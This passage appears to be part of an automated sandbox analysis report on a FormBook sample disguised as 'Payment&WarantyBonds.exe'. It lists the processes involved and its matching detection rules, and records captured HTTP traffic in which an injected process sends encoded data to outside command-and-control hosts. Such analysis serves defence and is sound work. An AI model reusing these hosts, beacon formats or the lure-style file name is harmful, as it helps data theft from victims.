                                                                                                                                                                              Data Raw: 5a 54 3d 4e 61 6d 2f 44 66 57 57 37 50 39 48 62 71 68 48 6e 63 54 44 56 67 6b 2b 6c 33 45 43 78 73 74 73 6e 34 76 68 36 65 56 78 7a 6e 6c 4a 49 69 4f 38 7a 48 45 46 51 74 41 77 79 73 46 42 74 56 74 4d 4a 66 4a 48 45 78 41 43 38 6c 46 33 36 75 31 70 2b 67 43 55 37 78 6d 6b 5a 31 6b 46 74 6a 38 53 30 6a 77 61 34 31 51 59 6f 6e 6e 41 43 35 4c 69 35 4b 49 6a 37 73 73 56 70 4c 43 6c 4e 36 59 54 37 49 50 37 5a 6e 63 70 75 7a 74 4e 67 58 39 55 4e 35 30 73 7a 4a 6c 64 31 59 33 6d 58 4b 31 69 54 61 54 6a 39 6b 32 62 6e 78 58 42 67 6f 37 43 72 57 66 43 6f 70 62 50 68 5a 6b 74 4b 30 71 41 62 50 6d 6f 70 6c 49 32 6a 38 39 7a 34 4f 75 52 68 36 64 4f 4c 4c 52 32 44 67 47 51 39 63 4b 52 74 58 45 50 58 72 66 6c 52 63 4c 2f 44 45 33 38 56 77 63 69 78 4e 69 62 6b 6d 69 42 62 72 72 7a 36 73 61 31 57 45 4a 4a 6b 68 4d 32 76 73 65 43 59 4c 37 57 51 74 69 55 6c 53 46 48 57 45 6b 44 6a 57 69 32 71 4a 75 68 31 6e 70 6d 4e 4f 4c 61 6b 6e 6d 4b 41 37 4b 68 56 6f 7a 4e 61 44 7a 39 39 36 61 64 45 31 53 38 77 37 58 4c 57 73 44 [TRUNCATED]
                                                                                                                                                                              Data Ascii: ZT=Nam/DfWW7P9HbqhHncTDVgk+l3ECxstsn4vh6eVxznlJIiO8zHEFQtAwysFBtVtMJfJHExAC8lF36u1p+gCU7xmkZ1kFtj8S0jwa41QYonnAC5Li5KIj7ssVpLClN6YT7IP7ZncpuztNgX9UN50szJld1Y3mXK1iTaTj9k2bnxXBgo7CrWfCopbPhZktK0qAbPmoplI2j89z4OuRh6dOLLR2DgGQ9cKRtXEPXrflRcL/DE38VwcixNibkmiBbrrz6sa1WEJJkhM2vseCYL7WQtiUlSFHWEkDjWi2qJuh1npmNOLaknmKA7KhVozNaDz996adE1S8w7XLWsDUtydyj2Lkza9PWhn0xwCdNFEhG7VSzL75IqJcnwBLlZHiBNncZFgf89rqo7mHwPeHGEHCH8VFmLJZqI4pM6iDXI2afHL/xD9yaqc/jDiZwhEImWkj8/1mJSlYTNMXt2PTDbYy6wWTyVEk1OPqP7qHaQ2tZ75UoBuRWmjSdtcpXhtzM9nnAA7pgqDR2Jcpn85CcMWzfuHB2g2SJ8a+bYexuR1fJQQw9KYr1Xn3qpb9ERGrsU8kOrZtKvuryy8LIp74WoQbuziKiPRer1BHBQWvp0wGyHKhc3A6Pu+ou298YFE9s7GUp3JbuTURB9T5i27lj8flGphYz6hge7VPRWi/5NAZLL66VnFDtpYPWip1ipH4DpMkp0fiKtzQ/J2NS4ADcG6Het9yaqCYAjN4uH4u6D224Edw0oRhvUiG3CzlysBmkQkJ7m1tgZBdRbpsJ4ew1zSg7bIYMm6FPUC7sdlYcGhMH5ksNfhvAybVJhvYaRW9icWcQYKXNf4niWaxvzSZzKM81EfTutVwekoAl38AkHkK76pP3w1E9bPChxOAU7T/1IFSr5aNLbmyderpvjfuD2v7IUqdbBL3GEIuU5cg2K/N2l1VK5h1PbEZVdc8L4d5txOatyqpZullCFw2Eif+osPwd4FL22Gmx4yYcef1mSG5m3uReJeYu [TRUNCATED]
                                                                                                                                                                              Oct 30, 2024 08:13:30.466429949 CET842INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:13:30 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7YCUGYchLbJXV%2FJMALRkbPKPygHb%2B2S6JqxaAviQJta1hjsQXmpeKvh65zoEcqumyG5DAZ1QD4k6R1bTTlbGapU%2BK%2F72Hk2jcXlwci3puO1qEYR5NiIEcWJcMk%2B13NCbB%2FpjBUbxiv1Hog%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1408&sent=1&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10841&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                              Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              48192.168.2.45005534.92.128.59803804C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 30, 2024 08:13:32.039005041 CET448OUTGET /33ib/?ZT=AYOfApeu9cghctp2i/KTSy5LkW4tz9x7+arej5d+r0NkQieZykYOddwLhoh5ni50J8Z5WiAS8Adn1ZwJ2laV/jmSd394ohUQohZCg1IJ+kicD56x/bghldI=&mTkD=Gj2Ti2T0g4 HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.sgland06.online
                                                                                                                                                                              Connection: close
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Oct 30, 2024 08:13:32.998105049 CET846INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:13:32 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ouUuSoRynzFb31XBRZ2NbLSS0T1agnkjrQ8iKzVwb2%2FXJVMwe4j1yptinmvoxDWI960JcFPZlCnFdzpt%2Fr6jJDHeebcMa07RucPBdwvXO30T3NJu5Jwyf8UPm%2BgwGEeCvp941JjH4M9fGA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1399&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=468&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                              Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              49192.168.2.450056152.42.255.48803804C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 30, 2024 08:13:38.229788065 CET713OUTPOST /jr4j/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.extrime1.shop
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.extrime1.shop
                                                                                                                                                                              Referer: http://www.extrime1.shop/jr4j/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 5a 54 3d 79 73 76 33 6d 69 6c 79 43 31 33 42 6f 6e 71 4a 30 76 38 74 46 68 50 6c 68 58 65 48 6a 63 6c 6d 44 4b 66 37 47 42 2f 34 79 4e 64 50 57 51 4a 42 79 37 7a 6f 32 51 76 78 6d 2f 38 4f 6e 2b 6d 52 51 51 31 41 73 4d 79 67 78 46 42 38 59 32 4d 66 31 72 73 44 76 67 4e 54 38 6e 78 78 6d 39 36 6e 67 69 64 73 49 42 4b 64 79 63 46 65 57 42 73 76 37 76 37 32 38 78 6e 7a 61 4b 4a 46 71 62 58 64 61 63 6a 61 35 53 4e 2b 61 6a 35 4b 65 6c 58 77 2f 37 6d 6a 64 4d 33 58 50 68 5a 42 4d 49 56 39 58 52 2f 54 75 4a 38 50 69 45 7a 6c 39 36 6b 34 41 2f 76 5a 6f 54 63 73 57 69 66 62 35 6a 55 38 4e 67 3d 3d
                                                                                                                                                                              Data Ascii: ZT=ysv3milyC13BonqJ0v8tFhPlhXeHjclmDKf7GB/4yNdPWQJBy7zo2Qvxm/8On+mRQQ1AsMygxFB8Y2Mf1rsDvgNT8nxxm96ngidsIBKdycFeWBsv7v728xnzaKJFqbXdacja5SN+aj5KelXw/7mjdM3XPhZBMIV9XR/TuJ8PiEzl96k4A/vZoTcsWifb5jU8Ng==
                                                                                                                                                                              Oct 30, 2024 08:13:39.234744072 CET289INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:13:39 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 146
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              50192.168.2.450057152.42.255.48803804C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 30, 2024 08:13:40.799501896 CET733OUTPOST /jr4j/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.extrime1.shop
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.extrime1.shop
                                                                                                                                                                              Referer: http://www.extrime1.shop/jr4j/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 5a 54 3d 79 73 76 33 6d 69 6c 79 43 31 33 42 35 33 61 4a 32 4d 55 74 43 42 50 6d 34 6e 65 48 74 38 6c 69 44 4b 44 37 47 46 50 6f 79 2b 35 50 57 31 31 42 31 35 4c 6f 6d 41 76 78 74 66 39 45 34 4f 6d 59 51 51 4a 49 73 4a 53 67 78 46 46 38 59 33 38 66 32 61 73 45 70 67 4e 52 30 48 78 33 72 64 36 6e 67 69 64 73 49 42 32 37 79 63 64 65 57 77 63 76 70 64 54 35 6a 42 6e 77 53 71 4a 46 75 62 57 55 61 63 69 50 35 54 68 55 61 67 52 4b 65 6e 66 77 2f 4a 4f 6b 47 63 33 52 53 52 59 34 4a 36 38 35 65 77 7a 63 76 49 63 55 76 51 43 47 78 63 70 69 52 4f 4f 4f 36 54 34 66 4c 6c 57 76 30 67 70 31 57 6c 74 38 78 48 73 57 49 2f 59 6d 64 72 31 2f 43 2b 32 73 35 37 41 3d
                                                                                                                                                                              Data Ascii: ZT=ysv3milyC13B53aJ2MUtCBPm4neHt8liDKD7GFPoy+5PW11B15LomAvxtf9E4OmYQQJIsJSgxFF8Y38f2asEpgNR0Hx3rd6ngidsIB27ycdeWwcvpdT5jBnwSqJFubWUaciP5ThUagRKenfw/JOkGc3RSRY4J685ewzcvIcUvQCGxcpiROOO6T4fLlWv0gp1Wlt8xHsWI/Ymdr1/C+2s57A=
                                                                                                                                                                              Oct 30, 2024 08:13:41.790015936 CET289INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:13:41 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 146
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              51192.168.2.450058152.42.255.48803804C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 30, 2024 08:13:43.354258060 CET10815OUTPOST /jr4j/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.extrime1.shop
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 10299
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.extrime1.shop
                                                                                                                                                                              Referer: http://www.extrime1.shop/jr4j/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 5a 54 3d 79 73 76 33 6d 69 6c 79 43 31 33 42 35 33 61 4a 32 4d 55 74 43 42 50 6d 34 6e 65 48 74 38 6c 69 44 4b 44 37 47 46 50 6f 79 2b 78 50 58 44 42 42 31 59 4c 6f 30 51 76 78 67 2f 39 48 34 4f 6e 4b 51 55 64 45 73 4a 4f 77 78 48 4e 38 5a 52 6f 66 7a 75 41 45 38 51 4e 52 32 48 78 79 6d 39 36 79 67 69 4e 6f 49 42 47 37 79 63 64 65 57 7a 45 76 35 66 37 35 77 52 6e 7a 61 4b 4a 42 71 62 57 38 61 64 48 30 35 54 6c 75 62 51 78 4b 65 48 76 77 73 71 6d 6b 62 4d 33 54 52 52 59 4a 4a 36 67 32 65 30 53 74 76 49 6f 71 76 58 79 47 37 59 49 35 4b 64 6d 33 6d 6c 77 7a 59 43 36 79 77 53 42 6b 58 47 6c 31 39 30 55 66 63 50 51 77 58 4c 39 33 66 65 61 4d 76 39 76 6e 45 32 6d 6d 73 2b 45 76 5a 69 4a 5a 36 78 34 42 42 4c 73 32 57 6d 74 5a 59 6c 47 6a 52 71 6b 62 41 44 38 4b 69 56 47 6b 50 4d 77 68 4f 65 41 45 36 5a 72 69 68 42 69 62 44 5a 46 45 4f 56 78 78 6f 45 75 41 79 30 2b 34 7a 44 47 32 6e 75 42 44 50 64 61 45 34 59 6c 6f 36 4b 50 47 34 48 36 2f 67 6c 64 30 71 76 52 4b 55 37 4f 6f 54 53 32 56 4a 4b 52 66 47 68 55 [TRUNCATED]
                                                                                                                                                                              Data Ascii: ZT=ysv3milyC13B53aJ2MUtCBPm4neHt8liDKD7GFPoy+xPXDBB1YLo0Qvxg/9H4OnKQUdEsJOwxHN8ZRofzuAE8QNR2Hxym96ygiNoIBG7ycdeWzEv5f75wRnzaKJBqbW8adH05TlubQxKeHvwsqmkbM3TRRYJJ6g2e0StvIoqvXyG7YI5Kdm3mlwzYC6ywSBkXGl190UfcPQwXL93feaMv9vnE2mms+EvZiJZ6x4BBLs2WmtZYlGjRqkbAD8KiVGkPMwhOeAE6ZrihBibDZFEOVxxoEuAy0+4zDG2nuBDPdaE4Ylo6KPG4H6/gld0qvRKU7OoTS2VJKRfGhUKTExlc6pwDOcA1A+jAvjcO0XRl3NKhOFt4RgiW1oiVoHLhFUwS9tL9ENRF1TdyOyfM9Pt8eIXuhcK7ls0wHS2mkd5FfdXcgCJWgwIM9yczmy5Cb7gfWXo47Qw5T1AwktatkkomMZdfMZmIKFcoMCbr33gF8ROsJRmxlJ0ckJTOJiKjc/jjQrtlYoGC0MlnrNOyIRSUL4W0lJnanCxk7QAPdui939ujEPnXR24oJhh4hvLZh1AJBP2/IsBBea5PB2JFXkhUti6cf9YOrTQzaObtkWMDP6BQaxXX1NXoCclfH8si5YhFTAFLAa7kcoVOgUetZ2PiAPDF4fwTyA6w43iYc4mM6bM2Slyf+YF3dIYHqkha2o4zTceozQdHMp/NGC0I8ZhfkSJMUeI6gRFFa8T1qXZCnVcXovsZQJQT1i87p4OhcODqm/ikz7XmP9qMNU/xdK0FCVXyXRaE91tX3h6V0xoCn4qPNGaBrUI5wx6DU7WSBdu7SM/FHk5AdzqGzZ64gAphFBErwgWIkPlYWMCPPVw8UmZbsb0QoEUncJKtWHHAVjhri8vu009tzUFr0NjG7ASneSYZRX3Eva9ab5ZiYEoz2trFX/nxb7C9mOXoCLth7RPCUSxbfsXbnLUkehKBHmciJs4iDXbCFe9hqMeUbvKzjmSYf1nN [TRUNCATED]
                                                                                                                                                                              Oct 30, 2024 08:13:44.345587969 CET289INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:13:44 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 146
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              52192.168.2.450059152.42.255.48803804C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 30, 2024 08:13:45.896469116 CET446OUTGET /jr4j/?ZT=/uHXlXwxCWKagG2f+cMqJk/ouEnshdx+b5P4XSvx6MlJZzR/8pbZgxPfuPQh+b7XVC9rmLmVxzweaBtr7+wSxihG8Hktp9qijzhrRRKR+f0leSIT4/3X8Bo=&mTkD=Gj2Ti2T0g4 HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.extrime1.shop
                                                                                                                                                                              Connection: close
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Oct 30, 2024 08:13:46.886544943 CET289INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:13:46 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 146
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                              Statistics

                                                                                                                                                                              CPU Usage

                                                                                                                                                                              Click to jump to process

                                                                                                                                                                              Memory Usage

                                                                                                                                                                              Click to jump to process

                                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                              Behavior

                                                                                                                                                                              Click to jump to process

                                                                                                                                                                              System Behavior

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:0
                                                                                                                                                                              Start time:03:09:40
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Users\user\Desktop\Payment&WarantyBonds.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\Payment&WarantyBonds.exe"
                                                                                                                                                                              Imagebase:0x640000
                                                                                                                                                                              File size:764'928 bytes
                                                                                                                                                                              MD5 hash:A9DA1B42F6AD80EE6085F69E6C25F49B
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:2
                                                                                                                                                                              Start time:03:09:46
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Users\user\Desktop\Payment&WarantyBonds.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\Payment&WarantyBonds.exe"
                                                                                                                                                                              Imagebase:0x950000
                                                                                                                                                                              File size:764'928 bytes
                                                                                                                                                                              MD5 hash:A9DA1B42F6AD80EE6085F69E6C25F49B
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2063986251.0000000001740000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2062501078.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2064136057.00000000021E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:6
                                                                                                                                                                              Start time:03:10:10
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe"
                                                                                                                                                                              Imagebase:0xa00000
                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4148377228.0000000002EC0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:7
                                                                                                                                                                              Start time:03:10:12
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows\SysWOW64\systeminfo.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Windows\SysWOW64\systeminfo.exe"
                                                                                                                                                                              Imagebase:0xe10000
                                                                                                                                                                              File size:76'800 bytes
                                                                                                                                                                              MD5 hash:36CCB1FFAFD651F64A22B5DA0A1EA5C5
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4148413603.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4148359872.0000000000B20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              General

